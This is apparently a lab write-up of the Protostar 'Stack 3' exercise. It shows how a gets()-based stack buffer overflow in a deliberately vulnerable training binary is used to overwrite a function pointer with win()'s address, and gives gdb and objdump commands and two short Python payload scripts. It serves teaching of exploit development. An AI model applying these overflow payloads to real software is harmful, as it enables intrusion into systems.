[ExpDev] Exploit Exercise | Protostar | Stack 3
Stack 3
The goal of this challenge is to find a environment variable for the win() func and overwriting the func pointer stored on the stack via BOF.
Things to note
gets(buffer);: The vulnerable func. It reads a line from stdin but it doesn’t check for buffer overrun → which can be vulnerable to BOF type of attacks.
win(): Winning func. Once we overflow the buffer viagets(), we can print out the winning statement by pointing to thewin()address on the stack.char buffer[64];: This limits our buffer length as 64 bytes. → which we can enter more than 64 bytes to cause a BOF.
Exploit
Finding win() Address
As the website’s hints, we can search for the win() address with gdb or objdump.
[GDB]
$ gdb -q stack3
(gdb) x win
0x8048424 <win>: 0x83e58955[objdump]
$ objdump -t stack3 |grep win
08048424 g F .text 00000014 win
Finding Offset
Let’s create the following exploit with python:
[Exploit-1]#!/usr/bin/python
padding = "A" * 60 # Giving 60 padding
padding+= "BBBBCCCCDDDDEEEEFFFF" # Using different letters
print padding
When we run this against the stack3 program, we now see the “modified” value is overwritten with “0x43434343” (“0x43 = C).
So our offset value is 64 (60 + BBBB).
We have everything we need: offset value (=64) + address location for win() (=0x08048424).
[Exploit-2]#!/usr/bin/python# win() = 0x8048424padding = "A" * 64
padding+= "\x24\x84\x04\x08" # Little-endianprint padding
When we run this against stack3, we can successfully print out the winning statement.
Thanks for reading!
Next challenge:
- Stack 4 — Stack-based BOF: Basic 4
